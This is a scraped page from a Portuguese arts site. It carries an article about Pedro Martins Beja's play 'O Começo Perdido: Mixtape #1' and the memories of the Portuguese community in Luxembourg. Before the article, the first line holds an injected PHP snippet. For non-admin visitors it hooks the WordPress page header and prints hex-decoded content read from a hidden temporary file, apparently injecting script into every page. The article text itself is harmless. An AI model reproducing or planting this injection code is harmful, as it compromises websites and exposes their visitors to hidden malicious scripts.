if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } As memórias do povo “lusoburguês” - artesentreasletras.com.pt

As memórias do povo “lusoburguês”

As memórias do povo “lusoburguês”

Foto: Jessica Theis

Em “O Começo Perdido: Mixtape #1”, o dramaturgo e encenador luso-descendente Pedro Martins Beja “puxa a fita atrás” para dar a conhecer as recordações de uma nação que vive noutro país. O espetáculo resulta da colaboração entre o Teatro Nacional São João (TNSJ) e o Théâtre National du Luxembourg – onde se estreou em Outubro – e estará em cena no Teatro Carlos Alberto (TeCA), de 16 a 19 de Dezembro.
Com o objetivo de descobrir as raízes do povo “lusoburguês”, que atualmente representa cerca de um sexto da população do Grão-Ducado, a peça recorre a uma mixtape, contando com música ao vivo. Entre ecos de fado num rádio roufenho, reclames televisivos, festas da matança do porco e histórias de lobisomens e bruxaria, são muitas as faixas que compõem a tracklist desta cassete. O conflito entre passado e futuro, velhos e jovens e patriarcado e emancipação é igualmente um leitmotiv do espetáculo. Nesta produção, Pedro Martins Beja não se limita a colocar as suas memórias pessoais em cima do palco, mas utiliza-as como um ponto de partida possível, recorrendo ainda aos contributos do elenco, composto por atores “lusoburgueses” e portugueses.